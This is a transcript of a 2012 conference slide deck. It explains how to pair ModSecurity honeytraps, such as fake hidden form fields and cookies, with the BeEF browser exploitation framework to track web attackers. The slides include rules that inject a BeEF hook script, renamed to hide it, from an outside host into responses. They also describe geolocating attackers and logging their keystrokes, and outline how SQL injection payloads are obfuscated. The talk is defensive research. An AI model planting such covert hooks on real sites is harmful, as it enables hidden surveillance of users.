Building a Web Attacker Dashboard with ModSecurity and BeEF

Transcript

1. © 2012 Presented by: Building a Web Attacker Dashboard with

   ModSecurity and BeEF Ryan Barnett Lead Security Researcher Trustwave SpiderLabs [email protected] @ryancbarnett

2. © 2012 Speaker Info: Ryan Barnett •  Trustwave SpiderLabs Research

   –  Specialize in Web Application Defense/WAF Research •  WebDefend (Commercial) •  ModSecurity (Open Source) •  OWASP –  Lead the ModSecurity Core Rule Set (CRS) Project –  Contributor for AppSensor Project •  Author –  The Web Application Defender’s Cookbook (Wiley, Dec. 2012)

3. © 2012 Target Audience: Defender Community https://www.owasp.org/index.php/Defenders

4. © 2012 Target Audience: Web Defenders http://www.swsec.com/resources/touchpoints/

5. © 2012 Agenda Breakdown •  OWASP Web Application Security Risks

   •  Situational Awareness –  Attacks –  Threats –  Tracking Threat Agents •  Building a Web Attacker Dashboard –  ModSecurity WAF –  BeEF –  Audit Console •  Example Usage •  Closing

6. © 2012 OWASP Web Application Security Risks https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology Attack Focus

7. © 2012

8. © 2012 Threat Agent Attack Vector Security Controls Block Attack

   Track Threat Agent?

9. © 2012 Threat Agents: Sharks You Random Opportunistic Directed Opportunistic

   Fully Targeted

10. © 2012 Threat Agent Tracking: Satellite Tagging

11. © 2012 Threat Agents: Web Attackers Your Website Random Opportunistic

    Directed Opportunistic Fully Targeted

12. © 2012 Common Attack Methodology •  ModSecurity SQL Injection Challenge

    •  Automation to identify injection points –  NetSparker –  Arachni –  Sqlmap –  Havij •  Manual testing in a web browser to develop working SQLi payloads –  An iterative process of trial and error 1.  Send initial payloads and observe DB responses 2.  Use obfuscation tactics (comments, encodings, etc…) 3.  Send payload and observe DB response 4.  Repeat steps 2 - 3

13. © 2012 Threat Agent Attack Vector Security Controls Block Attack

    Track Threat Agent?

14. © 2012 © 2012 Can you identify and track malicious

    web application users?

15. © 2012 Threat Agent Tracking: BeEF Tagging •  BeEF –

    The Browser Exploit Framework •  Penetration testing tool that focuses on the web browser •  Mainly used to demonstrate how internal web clients can become compromised •  Written in Ruby •  Lead Developer is Michele Orru (Trustwave SpiderLabs) –  Exploiting Internal Network Vulns via the Browser using BeEF Bind –  Thursday October 25, 2012 3:00pm - 3:45pm –  NTObjectives Room - Texas Ballroom II http://beefproject.com/

16. © 2012 Example Hooking via Stored XSS

17. © 2012

18. © 2012

19. © 2012 © 2012 Building a Web Attacker Dashboard

20. © 2012 Dashboard Components •  ModSecurity WAF –  Monitors for

    attacks –  Initiates BeEF Hooking •  BeEF –  Hooks malicious users –  Enumerates attacker’s location –  Monitors activities •  Audit Console –  Collects audit logs from ModSecurity –  Shares data with BeEF UI

21. © 2012 Update BeEF for Attacker Dashboard Usage •  Obscure

    the tell-tail signs of BeEF hook in config.yaml file –  From - hook_file: "/hook.js" –  To - hook_file: "/img-min.js" •  Modify the UI Text –  From – "Online Browsers" –  To – "Online Attackers"

22. © 2012 Updated BeEF UI Text

23. © 2012 © 2012 BeEF Hooking Defender Style: Setting HoneyTraps

    with ModSecurity

24. © 2012 OWASP AppSensor Project https://www.owasp.org/index.php/Category:OWASP_AppSensor_Project

25. © 2012 Setting HoneyTraps •  ModSecurity can modify HTTP response

    data going to clients –  SecContentInjection Directive –  SecStreamOutBodyInspection Directive –  @rsub operator –  STREAM_OUTPUT_BODY variable –  Prepend/Append actions •  Use these capabilities to transparently add HoneyTrap data to applications

26. © 2012 HoneyTrap Examples •  Fake robots.txt Disallow entries – 

    Disallow: /scripts.old •  Fake HTML comments –  <!-- old file is located at login.bak --> •  Fake Cookies –  Set-Cookie: user_role=1; expires=Tue, 11-Mar-2014 18:28:03 GMT; path=/; domain=.yoursite.com •  Fake Hidden Form Field –  <input type="hidden" name="debug" value="false">

27. © 2012 Fake Hidden Form Field Example SecRule STREAM_OUTPUT_BODY \

    "@rsub s/<\/form>/<input type=\"hidden \" name=\"admin\" value=\"false\"><\/ form>/id" \ "id:'999009',phase4,t:none,nolog,pass"

28. © 2012 Client View

29. © 2012 Fake Parameter Data Sent POST /wordpress/wp-login.php HTTP/1.1 Host:

    192.168.168.128 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv: 16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.168.128/wordpress/wp-login.php Cookie: PHPSESSID=39sg9cjq940h3bo9b0jmce2137; acopendivids=phpbb2,redmine; acgroupswithpersist=nada Content-Type: application/x-www-form-urlencoded Content-Length: 78 log=bsmith&pwd=paswword&submit=Login+%C2%BB&redirect_to=wp- admin%2F&admin=true

30. © 2012 Initiate BeEF Hooking SecRule ARGS:admin "!@streq false" "id:'999010',phase:

    2,t:none,log,block,msg:'HoneyTrap Alert: Fake HIDDEN Form Data Manipulated.',setvar:tx.malicious_client=1" SecRule TX:MALICIOUS_CLIENT "@eq 1" "chain,id:'999224',phase:4,t:none,pass,log, msg:'Hooking Client with BeEF due to HoneyTrap Violation.'" SecRule STREAM_OUTPUT_BODY "@rsub s/<\/ html>/<script src=\"http:\/\/ 192.168.1.109:3000\/img-min.js\"><\/script>< \/html>/"

31. © 2012

32. © 2012 © 2012 Executing BeEF Command Modules

33. © 2012 Caution •  BeEF is extremely powerful •  The

    use of many of its modules may violate hacking laws •  Consult your legal department before use

34. © 2012 Focusing on Monitoring Capabilities •  Web Fraud Detection

    vendors do this today –  Inject code for client device fingerprinting –  Inspecting the browser/ system for malicious code •  We are focusing on enumerating information about the attacker –  Geo Location –  Network information –  Keystroke logging

35. © 2012 Persistence: MiTB

36. © 2012 Get Physical Location

37. © 2012 Get Physical Location

38. © 2012 Iframe Event Logger

39. © 2012 Iframe Event Logger

40. © 2012 © 2012 WAF Event Integration

41. © 2012 ModSecurity Audit Console http://jwall.org/web/audit/console/index.jsp

42. © 2012

43. © 2012

44. © 2012 BeEF + ModSecurity Audit Console RESTful API

45. © 2012 ModSecurity Audit Console Integration •  Beef_dir/extensions/modsecurity/config.yaml beef: extension:

    modsecurity: enable: true name: 'ModSecurity' authors: ["antisnatchor"] auditconsole: ip: "console.yoursite.com" port: "443" ssl: true user: "defender" passwd: "secretpassword"

46. © 2012 WAF Event Data

47. © 2012 ModSecurity Alert Message Data

48. © 2012 Full Request/Response Payloads

49. © 2012 Closing •  Feedback/Questions? •  Email –  [email protected] – 

    [email protected] •  Twitter –  @ryancbarnett –  @ModSecurity •  OWASP Open Source Showcase - ModSecurity –  Friday October 26, 2012 2:00pm - 5:00pm –  Foothills I (17th Floor)